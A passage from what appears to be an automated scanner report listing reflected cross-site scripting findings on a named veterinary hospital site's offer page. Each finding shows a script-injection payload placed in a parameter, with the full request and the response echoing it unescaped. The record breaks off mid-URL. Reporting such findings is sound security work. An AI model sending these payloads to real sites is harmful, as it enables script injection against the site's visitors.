User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:50 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=isg82jqlearknsphgasmidgue5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=e5910"><script>alert(1)</script>83c5d7c83ea&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid
...[SNIP]...

2.65. http://www.vcahospitals.com/main/offer/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 541f7"><script>alert(1)</script>23387174e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?&state=FL&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F&541f7"><script>alert(1)</script>23387174e=1 HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:22 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14708

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
m action="http://www.vcahospitals.com/main/offer/thank-you.html?&state=FL&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F&541f7"><script>alert(1)</script>23387174e=1" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.66. http://www.vcahospitals.com/main/offer/ [newmex parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the newmex request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb26a"><script>alert(1)</script>f4e1c6835ca was submitted in the newmex parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0bb26a"><script>alert(1)</script>f4e1c6835ca&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.
vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:11 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=km7obviolbecfv91k623peolv6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0bb26a"><script>alert(1)</script>f4e1c6835ca&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB19543
...[SNIP]...

2.67. http://www.vcahospitals.com/main/offer/ [optin parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the optin request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e849"><script>alert(1)</script>730e752517f was submitted in the optin parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?&state=FL&optin=16e849"><script>alert(1)</script>730e752517f&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:04 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?&state=FL&optin=16e849"><script>alert(1)</script>730e752517f&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.68. http://www.vcahospitals.com/main/offer/ [other parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the other request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91c04"><script>alert(1)</script>eabbcd649dd was submitted in the other parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=91c04"><script>alert(1)</script>eabbcd649dd&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.
vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:33 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=ug4maua9n8npvts3q702mnacq3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
/www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=91c04"><script>alert(1)</script>eabbcd649dd&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A
...[SNIP]...

2.69. http://www.vcahospitals.com/main/offer/ [petage parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the petage request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79d43"><script>alert(1)</script>c56d9dd6dc2 was submitted in the petage parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=79d43"><script>alert(1)</script>c56d9dd6dc2&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.
vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:39 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=beecinp0q16pijh2d7fv3lo156; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
hospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=79d43"><script>alert(1)</script>c56d9dd6dc2&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-6606
...[SNIP]...

2.70. http://www.vcahospitals.com/main/offer/ [petname parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the petname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d62a5"><script>alert(1)</script>8bc90a2171d was submitted in the petname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=d62a5"><script>alert(1)</script>8bc90a2171d&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.
vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:44 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=t61kfqf8iod9f3ov4rimn1b057; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=d62a5"><script>alert(1)</script>8bc90a2171d&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%
...[SNIP]...

2.71. http://www.vcahospitals.com/main/offer/ [pettype parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the pettype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6359"><script>alert(1)</script>440a5a05f49 was submitted in the pettype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=c6359"><script>alert(1)</script>440a5a05f49&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253